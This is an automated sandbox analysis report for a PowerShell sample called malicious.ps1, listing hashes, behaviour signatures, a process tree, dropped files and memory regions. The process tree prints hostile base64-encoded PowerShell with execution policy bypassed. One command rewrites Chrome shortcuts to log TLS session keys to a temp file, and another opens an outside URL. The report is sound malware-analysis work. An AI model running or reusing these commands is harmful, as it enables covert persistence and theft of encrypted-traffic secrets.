Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

25/04/2024, 08:25

240425-ka9p9aha9v 6

25/04/2024, 08:17

240425-j671vsha49 6

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25/04/2024, 08:17

General

  • Target

    malicious.ps1

  • Size

    41KB

  • MD5

    b0eabea0c5a9d7805de694b90de4211a

  • SHA1

    12363433de1259efd04ffa0cb569ad1874f68405

  • SHA256

    9e87cc0374383be000268a7baeda2712a164d4dc8138a5218497da883adb1a61

  • SHA512

    ac7f19224164c09b4ba80142a35eb68a26bac57e51108f511bff57713dfe1e1e0c512a95165a0dc1b2b951ad046fba6fafc4d535dccc93a1023615be36fd34db

  • SSDEEP

    768:ww7zzQcwdAXDWAFQIkvqb+1wMm7hkmV5X0+KeFFLj4zb197:wwZXqAFlk8dMmVhV5hdjCZ97

Score
6/10

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious.ps1
    1⤵
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand ZgBvAHIAZQBhAGMAaAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAIABpAG4AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAALQBJAG4AYwBsAHUAZABlACAAKgAuAGwAbgBrACkAewAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsADsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0AJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAEMAcgBlAGEAdABlAFMAaABvAHIAdABjAHUAdAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAKQA7AGkAZgAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAFQAYQByAGcAZQB0AFAAYQB0AGgAIAAtAG0AYQB0AGMAaAAgACcAYwBoAHIAbwBtAGUAXAAuAGUAeABlACQAJwApAHsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAC4AQQByAGcAdQBtAGUAbgB0AHMAPQAiAC0ALQBzAHMAbAAtAGsAZQB5AC0AbABvAGcALQBmAGkAbABlAD0AJABlAG4AdgA6AFQARQBNAFAAXABkAGUAZgBlAG4AZABlAHIALQByAGUAcwAuAHQAeAB0ACIAOwAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIALgBTAGEAdgBlACgAKQA7AH0AfQAKAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBhAHgAaQBtAGkAegBlAGQAIABoAHQAdABwAHMAOgAvAC8AaABlAGwAbABvAC4AcwBtAHkAbABlAHIALgBuAGUAdAA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://hello.smyler.net/
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2608 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    b1e6206564afafa0ad318005175d16f0

    SHA1

    58813e96526e5f9f0b43dcbca8fe9e599664262e

    SHA256

    cb7933068db93c9c3097388666280766e7c4df596b2c09035c55ff4177c9b684

    SHA512

    0c3937609e19ac285fd43e283a584c2da1fe73f6fb52eb7389125a052cc65904fc9b8c7250145cf838e1584240c962629eb2aeca0caa41287b5d5382746e44ca

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    31cf61f49aed106f71b154dc5b0dc2eb

    SHA1

    57f8ea611ec81e80000ab7d391e7b7dc85e779a0

    SHA256

    cacd2aaed908f76eef366f13d6433147645100c33f5f5f02156dc84031872e1f

    SHA512

    da0555057ecb646922457367af8faf9696b2bfc5508959b177714d366aa7aca2cb9fcc5e8825ba6ed4851f9c23cd689fdd61fed21ca51d3f21b8460a2551f05d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    f7d32ae945308c028298287bd88abe6c

    SHA1

    99e580e577da39e748fd259fa487371bfe0d6dbb

    SHA256

    2e83a1b38e09ec0d61d5d67d18d13c959673a914621dfc5e3901202245a2a1bd

    SHA512

    29d579e6105730fe8ccda29da8be6151b48fca2f1eb6bd4e3610569578effed193101c5c885984350f3b40bf20924de5f77ebaa7310f1170b0257b5884a5f7f0

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\3pl5scb\imagestore.dat

    Filesize

    1KB

    MD5

    8fae3861f677178e6c739f41b97b6e0c

    SHA1

    9caf3322035228492d662d179d2fe5a9e4fb40d5

    SHA256

    87185a16a7f4b23b40cddf910aa0ea60dc9700ffa8297b2d2b2a43372b716a15

    SHA512

    888284de50c6bb654d93a49c8aa51a9909aa88a468c533a2a310818e51a6bceccce3cf26c31597b773e69ed1f247192bb36375a22c0441f01c4732f92efab1cd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8ADCJI8Z\favicon[1].ico

    Filesize

    1KB

    MD5

    f2a495d85735b9a0ac65deb19c129985

    SHA1

    f2e22853e5da3e1017d5e1e319eeefe4f622e8c8

    SHA256

    8bb1d0fa43a17436d59dd546f6f74c76dc44735def7522c22d8031166db8911d

    SHA512

    6ca6a89de3fa98ca1efcf0b19b8a80420e023f38ed00f4496dc0f821cea23d24fb0992cee58c6d089f093fdefca42b60bb3a0a0b16c97b9862d75b269ae8463b

  • C:\Users\Admin\AppData\Local\Temp\Cab83D1.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Cab89B0.tmp

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\Tar84BE.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\Tar8A21.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\run.ps1

    Filesize

    58KB

    MD5

    ecee6cc4e0bf90b7f0584a25788af710

    SHA1

    29ee18dfa7b14336070ce8ba73af3ac12a50b19a

    SHA256

    990c2addcb8712bf9e3f246d73045f8dc33ebbe42fa8297fa3a504e11d8f067c

    SHA512

    050690ba9a389a361a29bdc66e1925d8f241bdc96add1180ee2709e9c8962c59f4e4dfd3295b18b71310cd8dd2cfff052c1e2dbe5c1e38bd818121ca6e6f9e9b

  • C:\Users\Admin\AppData\Local\Temp\~DF555B41511E7B3430.TMP

    Filesize

    16KB

    MD5

    0c164dbadd246bea70980aec1840e179

    SHA1

    41f12d48807416d719b9b2ceace14549923d0538

    SHA256

    51c76f11fed46ce01fce9d534d61c3b2b5ea26ec31d01e769c6116f534a47ac6

    SHA512

    e728fa13dcdf7a3e3704a53b332aac744101820c0e841cdbebb96a52b1a4f726708385d3b3c7f58a296fd71eaf6e25ef8c97824a33dca6d8bcff1b307df0e80e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    8b5d2bbeacd4f7c4836cc2ab2d4293f0

    SHA1

    7f8f10e8757eb58acee81406a195135c7ef0001b

    SHA256

    424c03f8637cbbe2e9971e12647b8ba2d4e3f2dc6cf632493b40c07717d93d0b

    SHA512

    7a89cd993478e245c1ee00ae5c2c143dfade2b2c00398e8b6cae741eb6f5efd7a780085c61e3c3738190922515cbd609481e345dc79b76e7249447f427dc85e0

  • memory/2084-35-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2084-32-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2084-33-0x0000000002860000-0x00000000028E0000-memory.dmp

    Filesize

    512KB

  • memory/2084-28-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2084-30-0x0000000002860000-0x00000000028E0000-memory.dmp

    Filesize

    512KB

  • memory/2084-31-0x0000000002860000-0x00000000028E0000-memory.dmp

    Filesize

    512KB

  • memory/2084-29-0x0000000002860000-0x00000000028E0000-memory.dmp

    Filesize

    512KB

  • memory/2128-73-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2128-34-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2128-11-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2128-9-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2128-10-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2128-5-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2128-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

  • memory/2128-7-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2128-8-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2128-48-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2128-4-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

    Filesize

    2.9MB

  • memory/2128-102-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2128-50-0x0000000002C90000-0x0000000002D10000-memory.dmp

    Filesize

    512KB

  • memory/2548-19-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-22-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-18-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

  • memory/2548-17-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2548-20-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

  • memory/2548-21-0x0000000002940000-0x00000000029C0000-memory.dmp

    Filesize

    512KB

  • memory/2784-43-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB

  • memory/2784-42-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2784-49-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB

  • memory/2784-44-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2784-366-0x000007FEF5480000-0x000007FEF5E1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2784-45-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB

  • memory/2784-588-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB

  • memory/2784-589-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB

  • memory/2784-590-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB

  • memory/2784-621-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB

  • memory/2784-46-0x0000000002D90000-0x0000000002E10000-memory.dmp

    Filesize

    512KB